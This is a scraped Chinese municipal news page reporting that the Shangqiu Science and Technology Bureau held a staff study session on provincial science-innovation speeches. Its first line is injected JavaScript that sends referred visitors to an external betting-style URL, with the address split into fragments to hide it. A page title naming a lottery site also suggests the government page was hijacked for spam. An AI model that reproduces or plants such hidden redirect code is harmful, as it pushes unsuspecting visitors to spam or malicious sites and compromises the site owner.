var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

商丘市科技局专题学习省科技创新委员会第一次会议及楼阳生书记在省委工作会议上的讲话精神


发布日期:2021-09-28 03:42来源:商丘市科学技术局 阅读次数:

  9月23日上午,商丘市科技局召开全体会议,专题学习省科技创新委员会第一次会议精神,同时又传达贯彻了省委书记楼阳生在省委工作会议上的重要讲话精神。

  通过学习省科技创新委员会第一次会议和省委书记楼阳生在省委工作会议上的讲话,大家一致认为,为当前和今后一个时期科技创新工作指明了方向,提出了明确要求,也提供了基本遵循。我们一定要提升政治站位,形成高度共识,进一步把创新摆在发展的逻辑起点、现代化建设的核心位置,全力建设河南创新高地。在实际工作中创新生态构建事关科技创新根本、事关现代化建设全局,必须作为基础性全局性战略性任务来完成。做好下步创新工作,要突出整合重组实验室体系、提升高校和科研院所创新源头供给能力、推进规上企业创新全覆盖、深化科技创新体制机制改革、全力打造人才高地、持续打造一流创新生态。

  市科技局全体党员干部表示,要深入学习领会省科技创新委员会第一次会议精神和省委书记楼阳生在省委工作会议上的重要讲话,认真开展学习讨论,结合各自工作实际,进一步理清工作思路,坚定信心决心,把会议和讲话精神落实到具体工作中,切实推动我市科技创新高质量发展。